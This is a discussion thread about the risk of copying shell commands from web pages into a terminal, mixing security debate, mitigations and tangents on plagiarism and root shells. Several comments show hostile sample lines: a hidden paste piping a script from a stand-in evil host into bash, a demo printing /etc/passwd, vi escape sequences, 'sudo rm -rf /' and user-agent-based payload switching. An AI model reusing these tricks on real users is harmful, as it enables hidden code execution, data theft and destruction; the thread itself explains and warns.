Don't copy paste from a website to a terminal
thejh.net
thejh.net
What is the actual risk here, how many people have been bitten by this sort of thing and what was the resulting damage? I'm not saying there isn't any risk, clearly there is a possibility for exploitation here so chances are this is an actual risk. But I find it hard to make the case that we should all now start re-typing all the text in how-to's and scripts. It's one thing to run wget | curl, quite another to distrust each and every snippet of code on the web. I don't see much difference compared to say installing Ubuntu from a website whose contents I haven't inspected and that may have been built with a bunch of malicious stuff in it, I did not actually inspect all the source code this machine was built up with and I would be busy for half a lifetime if I did, so I outsourced the trust and verify that trust by looking at some checksum but that's about the extent of it.
Is there anybody that can quantify this risk somehow?
Has anybody been personally burned by this?
E.g. cut and paste a command and get a linebreak in the wrong location and the "rm -rf /var/tmp/foo" turns into "rm -rf /var/". Fun times.
These days I'm more and more often just spinning up temporary containers as well. Not so much for security as to avoid making a mess of my environment with all the stuff I'm testing. So trivial to start out with a "docker run --rm -t -i ubuntu -v /some/suitable/host/dir:/mnt /bin/bash -l" or similar to get a fresh container with a directory I can dump anything I decide I want to keep in.
So is it safe to cut-and-paste that line there ;) ?
I type very fast but if I see a 100+ character line with a whole bunch of flags and what not the chances of introducing a fatality while re-typing it (was that / var or /var?) are quite large.
And of course anything that involves 'rm' or other nice and friendly commands gets an extra eyeball but at some point you have to decide to pull the trigger or not.
docker run -it --rm -v `pwd`:/mnt ubuntu bash
Also, this one works, the other one doesn't ;)
So if it also protects me against this, I say doubleplusgood.
While this doesn't help that theoretical set of initial victims, it just doesn't feel like a credible risk worthy of too much worry, especially for information from higher profile sites with reputable backing.
Perhaps the solution here is better mechanisms for validating what a script can do - "script is attempting to access xyz, allow? y/n".
If a perpetrator is smart, the malicious script is going to be hidden a few invocation layers deep, and will only remain up for short intervals. A naive or stupid perpetrator is going to get caught quickly. But the medium is such that a smart one can hope to evade detection.
I was administering a final exam to a programming class. Exam was done on class computers, so with me in the front of the room most of the time I couldn't actually see what everyone was doing (and given the nature of the class, if you cheated it probably wouldn't really help you anyway).
Grading one student's submission, the wording of most of the "essay" questions seemed ... odd. Nothing objectively wrong, but everyone has their own writing style and his answers weren't, well, his. Scrolling thru one particular answer there were some blank lines after the answer ... and then a URL. The URL contained much of the test question. Checking the unfamiliar site, it was a paid technical-question-answering service, base price for answers $30 and rising depending on depth, quality & speed of answer. Copying-and-pasting the purchased answers added the source URL to the selected text, proving malicious plagiarism on the final exam. I figure he spent at least $300 to fail that exam and get one strike per the school's "three strikes and you're out" policy.
At the schools I went to, I don't think a single plagiarism incident would get a student kicked out. They would fail the assignment or the class.
I'm not encouraging cheating here. But I learned that sometimes you have to accept that you hold to some rules just because morality, and you don't need to invent practical reasons to justify it to yourself and others. Sometimes following the rules leaves you worse off, but the world where people follow those rules is better for everyone than the world where they don't, and I want to live in the former.
Also the idea that "the system is underpinned by the notion nobody can cheat" is absurd. Cheating is rampant! Even in the ivy leagues. Especially in the ivy leagues! But people still value college degrees.
I'm not really a fan of no tolerance policies; I would rather the system be re-evaluated so that credentialing and training are the goals of the system, not pushing as many credit hours through the administration as possible. :)
So far in my short SW engineering career I haven't used a single thing I "learned" from my B.Sc degree, but what school did was to let me hang around with same minded people for few years which encouraged us to work on side projects together which taught us way more than any class.
That being said, I didn't cheat either, but I don't think cheating once is a good grounds for expelling someone.
Devaluing the degrees of everyone who didn't cheat, both economically and socially.
At least that guy didn't pay for it - to my knowledge at least (he did cut and paste most of his answers from various places, though, and got many of them wrong, including an word-for-word copy of an answer from a forum where the answer he had quoted was torn to pieces by other commenters right below).
If I knew the answer, or had a decent notion of the answer? Hell no.
Interview questions are an opportunity for you to show what you are worth. If you're worth less than a book, it's not a good sign.
No one knows everything; or even a majority of things. How fast you can find an answer is what determines your productivity. Whether its via a book, a man page, google, stack overflow, or asking the right people doesn't matter.
If I needed specifics about Oracle, sure. I don't expect to ever need that.
But the more important aspect was that the full, complete answer to the question we raised took a single, short sentence. It was not clear from the page he had cut and pasted whether or not he even understood the question, so even if he hadn't copied it without telling us the source we'd not have considered it an acceptable answer.
>Has anybody been personally burned by this?
I imagine a lot of devs who follow bad practices cause a lot of havok, but its up to the security and sysadmin team to clean up after them. They may not be fully aware of all their bad practices and a refrain of "Let us be bad, it hasn't caused any problems yet," is short-sighted.
>say installing Ubuntu from a website
At the very least you have a SSL identified site and published checksum hashes on a separate server. That's a far cry from a random shell script. Installing an OS is a special case anyway, so its not really a good comparison here.
edit: typos
People get burned by this sort of thing all the time, malicious downloads were hip when Clinton was in the White House. Yes, only on Windows, and yes, easy to thwart if you know what to look for, but it's disingenuous to say that it's never happened. These things are attacks on your ability to recognize and be vigilant, and you can't recognize and be vigilant of everything at the same time.
Obviously the particular vector of console pastes hasn't been exploited yet but that doesn't mean it won't ever. When it does, we'll mourn the passing of our current free-wheeling days the same way we mourn the old Usenet.
Exactly. And what I essentially typically say is "the scope of the problem has not been defined".
We see this often on news reports on TV as an example. They go off with hyperbole about some issue but fail to address exactly how many people have been effected by it. Simply saying things like "there is a growing concern..." or cherry picking examples.
We see this now with cases of "police brutality" and use of unwarranted force. It's not that it doesn't exist, but that any reports totally ignore how often it actually happens vs. how many times it doesn't happen.
wget https://example.com/script.sh | bash
If you trust the source, you might as well install it. Otherwise, we're basically arguing that everyone who has ever installed any non-distro software is an idiot.
Consuming http or the connection dying and script ending early and being left in a weird state is probably a more interesting argument than the trust issue.
$ git clone https://github.com/somedev/package .
$ ./install.py
The text on the webpage reads
wget https://example.com/script.sh | bash
but when copied is actually
wget https://evilpile.com/script.sh | bash; echo wget https://example.com/script.sh \| bash
or whatnot.
There are ways to assign this to a keypress or button as well.
The website threat model also allows the bad guy to target someone by IP, or some country, or only put the malicious code 1 in 1000 times, so it's not going to be widely noticed, etc.
Or it could be an HTTP (not -S) website and someone MitMs you (OK that is a pretty far-fetched attack vector for someone who MitMs you, I admit).
edit: although I agree with you that I've personally never encountered a case where this specific malicious trick happened
No obvious motive or relationship is needed, especially when mental illness is considered. It could be that some stranger who lives elsewhere is walking down your street and might be looking to mug someone.
Those have the same risk as curl|sh
I'll absolutely grab a binary or `curl | sh` from slack.com. I won't do it from a forum. But I would copy a terminal command that didn't look like it was doing anything fishy from a forum.
If someone take control of a popular git repo and push a malicious build script. How many people will be affected before the fix ?
But this doesn't seem to happen very often too.
For web-sites, that includes direct hacks that make the site distribute malware, as well as "malvertising", etc.
So that old lady next to you may actually be the gang of thugs waiting in a dark alley.
But I don't think that the malware distributors are likely to choose an uncommon channel like copy-and-paste as a distribution vector, so you're probably still OK.
Had to be done.
"The GNU folks, in general, abhor man pages, and create info documents instead. Unfortunately, the info document describing tar is licensed under the GFDL with invariant cover texts, which makes it impossible to include any text from that document in this man page. Most of the text in this document was automatically extracted from the usage text in the source. It may not completely describe all features of the program."
And truth be told, I have used stackoverflow to look up things, even things that I knew before but somehow lost due to inactivity, a lack of RAM refresh so to speak. I'm not ashamed of that and the IT field is now so incredibly broad that I don't feel that I'm the exception there, it's very hard to keep all of the moving parts of a webstack in your head and even harder to keep up when the platforms are changing right underneath you.
And yet I don't feel as if I fall under the 'guy that hasn't internalized the core knowledge of our craft' rule :)
In my experience, this sort of attitude leads to things like people saying "What the hell? Your resume said you knew Linux!" when you fail to know every single quirk of the specific unpopular distro that they're using. Don't be that guy.
But in all of the scenarios you just mentioned:
1) It's immediately obvious something's very wrong. (Assuming pizza contains poison.)
2) It's very likely the perpetrator will get caught.
3) No one else is left with control over your resources
Trusting a script from a website to the point where you execute it in your terminal could result in someone controlling a rootkit on your machine, without you ever knowing, with little chance of a savvy perpetrator getting caught, and with all of your operating system tools subsequently lying to you about any information you could use to detect the event.
That said, I've trusted such scripts and "gotten on with my life" on several occasions.
While this may not be a huge issue in practice, I have no idea what motivates the inclusion of functionality that manipulates the clipboard in the browser. I don't really think that the analogies of anyone swerving on the highway or someone poisoning your pizza apply. It's more like your seat belts were deliberately removed, or someone put arsenic right next to the pizza box just in case anyone would want to poison you.
I'm not sure, but I expect that it's the same sort of thing that motivates the inclusion of the ability to enable page content obfuscation schemes that -say- scramble a page's plaintext, but use CSS styles and JS voodoo to make it appear like the page contains only comprehensible text.
I expect that -when using such a scheme-, you'd need to be able to modify what is being tossed on to the clipboard, as -I expect that- the inbuilt selection tool will pick up your garbage data as well as the intended text. [0]
Edit: To be a little more practical, you could (for instance) use the ability to modify the contents of a clipboard to -say- create custom representations of your web application data formats and allow relatively easy transfer between instances of the software.
[0] Yes, I do recognize that allowing copy and paste kinda defeats the purpose of this scheme, but the scheme is something that I've seen in the wild.
But without being able to manipulate selections, some nice features of certain sites would be lost. (e.g. the "share" link in StackOverflow automatically selects the URL for you so you only need to press Ctrl-C, instead of having to select it manually.)
Also, non-TLS web sites can potentially be hijacked in flight, so this could happen even if the site in question wasn't directly cooperating.
Just me.
I've seen a gist posted at bitcointalk (a scammerful place) to do currency convert in php or js, can't remember. The gist contained hidden code at column 300. Not that I was personally burned, but yea, I've seen in it the wild.
But there is a difference between the two types of attack you describe that seems to change the rules on the web at least somewhat.
The difference is risk to the attacker. If I start punching someone on the bus, getting thrown off is the optimistic outcome. I could reasonably expect to be arrested, or assaulted in return, possibly fatally.
But if I post malware on the web, the worst I could reasonably expect is that the offending content is taken down, my account with that host rescinded, and assuming I do nothing to conceal my identity, I may become known as the type of scumbag who does such things. I grant that much worse results are possible, but it just doesn't seem realistic to expect much worse punishment, so long as a government or large corporation wasn't a serious victim.
Or so it seems to me. Thoughts?
It's hard for me to see what is the difference between people who question formalizing best practices in computing and people who disagree with modern car engines and seatbelt laws.
We do these things not because it always makes a difference for one single person all the time but because it the system move in the right direction leading to possibilities we couldn't foresee from the beginning.
Someone who works in "real world" security and always have to weight in the downsides, e.g. the implications of privacy when installing a security camera on a bus, must think we are crazy questioning such low hanging fruit.
"Oh, and it seems that other people wrote a detailed text about this issue in 2008."
Well ... yeah. We've known about this. And yes, we need to keep making people aware. I'm also amused by all the young people and their containers: always doing things in a root shell. I'm waiting for that to implode in a few more years.
My point here is that maybe it's time we started designing some curricula around these things that people keep rediscovering: Why you do indeed want a relational database manager and probably not a 'NoSQL' store; and when you do want a NoSQL store. Multiplexing existing systems with VMs; how your VPS works and why it worked so well on mainframes back in the day. (and oh, btw did you know that you can just pull hardware, including CPUs, right out of the mainframe and it'll keep doing its job?) Dangerous things we've all done at some point and prime (hands-on) examples of the failures that might ensue...
And no, I don't mean (necessarily) to teach in schools. Maybe an online collection. "So you wanna 'do computers' without getting hacked and without re-inventing everything..."
Honestly, something that seems desperately needed as that knowledge is currently spread out among hundreds of thousands of blog posts, forums and threads -- diamonds in the rough.
I'm going to try to get something published on gumroad (and open-sourced on github) in this vein, if you're interested let me know and I'll reach out when it's done :)
I am a theorist in an experimental laser group, and the group head remarked on a possible counter-intuitive arcing between two separated plates (for the sake of making an electric field) when pumping out the air in a chamber. One would expect that pumping out the air reduces the "stuff" (air) that could support a current between the plates, but due to other physics (longer mean-free path) actually allows a sweet point in which the plates can arc, possibly ruining equipment like power supplies. No one thinks about this until it happens because it's physically counter-intuitive, and its too late...it really is one of those "never happens until it happens" sort of unexpected catastrophes that even if you read it in a book, you'd probably never remember it. He said this is why it's important to have newer grad students work with senior graduate to provide continuity and experience so these mistakes don't reoccur...that, I suppose, the horrific memory of destroying expensive power supplies helps the senior grads remember it better compared to someone reading a list of warning labels in a manual...
I'm assuming if you're a small start-up, you don't have more experienced people unless you hire them. So yeah, something like the C++-faq for general hacking suggestions is fun, if someone reads it.
Not entirely sure about that; my first intuition here was "temperature and pressure do pretty similar things to chromodynamic interactions—so if materials become more conductive [or even superconductive] at low temperature, then gas media probably become more conductive [or even superconductive] at low pressures, too."
When there is a write up of "We just did this super awesome scaling migration to the new hotness!" -- there will be mini-how-to articles in them... or at least more in-depth reasons why and for what problem they were specifically solving.
A how-to-wiki-gist? with "this is how you connect X with Y over ABC service in order to eliminate problem XYZ" would be great and allow for people to contribut to the how-to...
But we've been saying this for 15+ years... :-)
Ah yes. The sudo high horse. I knew I'd see you again.
Viva La #
If you can elucidate the reasons (plural), you need to be in a root shell, by all means use a root shell. If you're doing because "it's easier" and no other reasons, then you probably need a bit more experience. In any case, always using a root shell is the Wrong Thing To Do.
Yeah sure this has nothing to do with sudo. Right, gotcha.
> If you can elucidate the reasons (plural)
"Reasons" means plural where I come from(denoted by the "s"). There is no reason to repeat yourself. I decline your request for an elaboration. The "don't use a root shell crowd" has clearly won the popularity contest in the same way TSA now has a significant presence at larger US airports.
> If you're doing because "it's easier" and no other reasons, then you probably need a bit more experience.
Don't jump to conclusions. There are few people here who can truthfully claim more experience than I could. Regardless of our experience levels, it bears no weight in the validity of my statement.
> In any case,
Not really.
> always using a root shell is the Wrong Thing To Do.
You are free to hold whatever opinion you wish.
I had to hold my nose and paste some commands like this in order to reinstall Composer [1] and Drupal Console [2] earlier this week. Ugh, it feels so dirty, but it's often the first and/or the easiest, if not the only, way that software like this documents how it's to be installed.
for instance, if I know you are using VI I can create a series of characters that will escape out of insert mode and run a shell command (note: ^[ is ESC (ascii 27))
git status
^[
:!echo foo
The real problem is that this is nothing different than trusting a binary download -- which many more millions (billions) do.
Turtles^H^H^H^H^H^H^HTrust all the way down.
I'm not being entirely facetious, either, given the advice about disposing of electronics after visiting certain countries.
I want to know what I'm doing with my server when I'm installing packages or other software!
On the other hand, if it's over SSL, you're just as well off as installing the software any other way. Although, I noticed the Drupal console installer isn't even on SSL.
Docker gets it right [1] and then gets it wrong [2] - depends which set of instructions you read.
I know creating distro packages and self-hosted repos is difficult, maybe we should be attacking that as a problem instead of writing hundreds of different shell scripts.
1: https://docs.docker.com/engine/installation/ubuntulinux/
2: https://docs.docker.com/v1.8/installation/ubuntulinux/#insta...
if 'curl' in request.UA:
return 'something malicious'
else:
return 'something nice'
Always create a local file with the content, read it, then perhaps run it. wget -qO- 'http://example.com/script.sh' | less
won't work to review the script?As other have suggested, there are still possible ways to trick you, but it's getting more and more remote.
Browser exploit kits commonly will return different stuff depending on user agent, and will track what IPs they have interacted with so that if after someone clicks the link you try to look at it, you'll get something harmless. Nasty business. The only way to be sure is to save it, inspect what you saved (make sure you use something that will show tricky escape sequences trying to hide things), then maybe run it.
There are any number of scenarios where any given solution could be broken. Why not point out that you OS might be compromised and the wget/curl binary that you're using is patched to present the wrong information to you?
https://ma.ttias.be/terminal-escape-sequences-the-new-xss-fo...
curl example.org | vipe | bash -
Which opens vim in the middle there.Another possible response -- the one I prefer -- is to change the web browsers so that the copy operation only ever copies selected text visible to the user. That is how the copy operation works in my text editor and how it used to work in web browsers in the 1990s.
Copying and pasting are useful. The fact that some are trying to persuade all web users to stop doing it -- or to stop doing one common kind of it -- is a sign that there is something wrong with current web browsers.
Yes, I know that Unicode contains glyphs that look so much like common ASCII glyphs that a user can be fooled into, e.g., curling from a site controlled by an attacker when he thinks he is curling from github.com or some other trusted site. Maybe that means that the browser warns the user whenever the copied extent of text contains non-ascii characters; maybe the browser simply refuses to copy the non-ascii characters. Regardless of how we deal with malicious use of obscure Unicode characters, I think my previous paragraph holds up.
(Users of languages other than English should replace "non-ascii" above with "characters not commonly used by writers of the languages that the user usually uses".)
P.S. I have a paranoid habit of pasting copied text into the address bar or a notepad to quickly check for unwanted characters. For once, I don't feel like I'm crazy.
Copy-Paste as WYSIWYG should be default, Copy-Special should be an expert-only option.
Try copying the Hello World text in this fiddle and paste it in a text editor:
http://jsfiddle.net/teleclimber/8q6sp5ga/
(Tested in Chrome)
> That was a bad idea. Don't copy code from websites you don't trust!
Or indeed, download software from websites you don't trust.
I guess the worry would be that hackers would, as an example, take over brew.sh and do bad stuff with installation url. As opposed to taking over brew.sh (in an alternate world where brew.sh hosts a dmg file or something) and hosting an entirely different file.
Bar the relative ease of hiding bad stuff in copy paste compared to making a fake dmg file, this seems to be basically the same situation no?
However, a huge portion of people (who this article is targeting), will freely copy and paste a terminal command from a random google result. That makes it a great attack vector for, say, intro to CS students who just want to make this linux thing work right.
What about stack overflow? Surely they are trustworthy. But if someone hacks them, and inserts an attack like the OP's, then you are in trouble.
There are two problems. First, the hardware we own is almost comically powerful, both in compute and network bandwidth. Second, that same hardware mediates between us and everything that is important to us: our lovers, friends, business partners, banks, and so forth. A subtle enough hacker might get into our system and we might not know it, ever. (Indeed, if the hardware manufacturer put some secret code into their stuff then such a hack might be very subtle and very universal indeed.)
I'm not throwing my hands up and saying it's all pointless. But consider that your typical gigabyte program has a tremendous amount of surface area to check. And no, you can't discount "dumb" resources like images and videos because they aren't executable. A smart attacker will encode instructions in, say, a viral YouTube video that will trigger those hidden CPU instructions that will load a steganographically encoded program. For now we have to be practical, and not freak out. For the future, we have to move toward smaller, more efficient software that makes unexpected computation and resource usage obvious from an outside observer. This means small code, short call-chains, and minimal screen, network or disk interaction.
(I'm particularly worried by the trend for basically all software to be constantly connected to multiple unknown external hosts, any of which could be controlling code on my machine at the same level as the program I installed!)
It boils down to trust. I trust that Mint won't screw up securing my bank credentials. I also trust that OSX HomeBrew's install instructions aren't fubar.
git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust! Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd git clone git://git.kernel.org/pub/scm/utils/kup/kup.git
However, copy, paste, (save as a script|paste in terminal), run isn't exactly the most strenuous task in the history of man either. So it'd be a fairly meaningless chain of plugins for close to zero benefit.
So (if vi): CTRL-X CTRL-E i CTRL-V[2] ESC :wq
[1] at least in bash, possibly others.
[2] or whatever your paste shortcut is, and then edit if necessary
Edit: seems this is also possible for zsh but needs some config first: http://nuclearsquid.com/writings/edit-long-commands/
Example shell command:
eⅽho 'hello world'
Copy-pasting the above command will fail with the message `eⅽho: command not found`. The reason? 'ⅽ' in 'eⅽho' is a unicode character "SMALL ROMAN NUMERAL ONE HUNDRED" that looks identical to regular ascii 'c'.The above can also be mis-used for any programming language, not just shell commands.
CTRL-X CTRL-E
If using zsh: http://nuclearsquid.com/writings/edit-long-commands/
runCb(){ cb; echo -e '\n\nGo on? (y/n)'; read -sn 1 ans; if [ "$ans" = y ]; then eval "`cb`"; else true; fi; } #cb should output the contents of your clipboard
Or another option would be to switch your terminal to editing mode (v in the normal mode of `set -o vi`), paste it there, and do `:wq` to run it.hah.
Re binary blobs - honestly, for me at least, if I'm installing a blob it's probably because I purchased the software. Maybe it's naive but I more or less assume no company is going to actively screw over a paying customer
Either way, when I paste I usually put it through a scrapped terminal. Meaning I have to hit enter twice for any command to actually be executed.
If you're not checking your commands before you hit enter it's like getting in a car for the first time and bringing it to top speed hoping that it won't rattle apart and kill you.
To further this analogy, if I were to get a car from a dealership brand new it might have some issues but for the most part it's brand new and safe. If I'm buying a car from some shady lot behind a Waffle House, well then I should probably bring it to a mechanic to get inspected and such.
To detract from the analogy, dealerships are giving out different new cars while copy/pasting code from tutorials such as Linode are always giving the user the same content, they've been checked numerous times and hopefully the bullshit has been caught already.
How does this work / how do you do it?
1. Copy in a harmless way first to be sure WYSIWYG.
2. Compare the commands against the man page or local docs to make sure they look right.
This is the method I created after someone posted this in response to me using an online cheat sheet for console app. I appreciated that person bringing it to my attention. However, this should knock out most risk in that area.
Other objections were essentially about how one shouldn't use commands from sources they couldn't totally trust. That's a BS double standard easily countered by, "Oh and I guess you don't run any code/binary you get from proprietary vendors or FOSS repositories unless you inspect every line to be sure it's safe?" Hell will both be empirically proven to exist and freeze over before those people's preaching and practices are consistent.
In trying to solve a black screen with Mint 17.2 I followed directions on adding a PPA to install Nvidia drivers and then remove the open source drivers. When I rebooted I still got the black screen and in recovery mode I could not log in because it said an ACL for a card was missing a file.
When I went to reinstall Mint it didn't want to overwrite the partition and wanted to create a new one alongside it. Forcing me to delete the Linux partition and start all over again.
A lot of websites just give wrong advice and if you aren't an advanced user who knows how to fix things when they break, you could be stuck with an unusable system.
Apparently that hasn't happened because of compatibility problems with broken terminals, plus perhaps a bit of work that no one's stepped up to do. If anyone wants to tackle this, the GNU readline library would be the place to do it.
Besides, teaching shell about bracketed paste could only help for pasting directly to shell; it won't help if you're pasting to vim (think of "^[:q!echo pwned^J") or cat (think of "^Decho pwned^J").
tripple-tap on both urls give "git://git.kernel.org/pub/scm/utils/kup/kup.git" (with the exception that the first one contains a newline), and in such cases I am too lazy to reselect and just prepend the url with muscle memory git clone.
I mean, even venerable Git is well-known for having this workflow:
not to mention tar
... I wonder how many "google-oriented development" OSS tools has xkcd made a comic about?
Terminal escape sequences – the new XSS for Linux sysadmins: https://ma.ttias.be/terminal-escape-sequences-the-new-xss-fo...
I did a "cat >/dev/null" before pasting so I could see what it was. Clever masked/hidden content, with embedded shell commands and newline to commit the commands.
I could have just as easily opened vim/emacs/notepad and done the same, or for that matter, written the contents to an actual file instead of redirecting the contents to /dev/null.
dangerous-commands \n
^d #eof
dangerous-commmands \n #repeat
(I'm not actually sure if you can paste ^d in general... but I expect you could?)Another handy convention is the magic "-" filename (which is not actually a file). Many tools interpret that to mean stdin/stdout. For example here is a trick to copy a tree of files:
tar cf - src | (cd dest && tar xvf -)But wrt your trick to copy a tree of files, what's wrong with `cp -r src dest`, or `scp -r src desthostname:/dest` if it's over a network? Is there some advantage this way?
cd ~/src/mysite && tar cf - . | (cd /var/www/public_html && tar xvf -)
or this (remotely): cd ~/src/mysite && tar czf - . | ssh mysite 'tar xvzf - -C /var/www/public_html'
I would probably actually use rsync for this, but there have been times the tar approach came in handy.A long time ago, in the dark ages of version control, I used to use tar for rollback-able deployments: I would create a tarball of the files in development to be deployed, and I would create a tarball of the files in production to be overwritten. Then I could just explode one tarball to deploy and the other to rollback. Not something I'd do today, but we didn't always have such nice tools. :-)
as:
git status
^D
echo foo
He talks about this as well
https://news.ycombinator.com/item?id=4247566
TL:DR "Just paste this obscure python code into the console!"
I'm still surprised, looking back at that thread today.
At the time I'm typing it the post has 516 points and 201 comments, so many people have been here. Now: how many people will actually stop doing that after reading the post? Because I don't think I will.
This is how it looks in this instance :
#!/bin/bash sudo rm -rf / | curl
Then switches to running things in the terminal. We already saw your 'trick' in step 1 when viwed in our Snippets Notepad file...
If you click outside the text and drag across it, this page makes a lot more sense.
Luckily I usually do the paste, but not for security reasons, to make sure formatting is as expected.
Now I have a reason to do that every time.
Thanks poster!
I always paste into Emacs notes first
it says "Yank git clone dev/null..."
(and changes the whole FF, not recommended as a remedy for this issue :)
cat -A - and here paste text, you can see what is going on.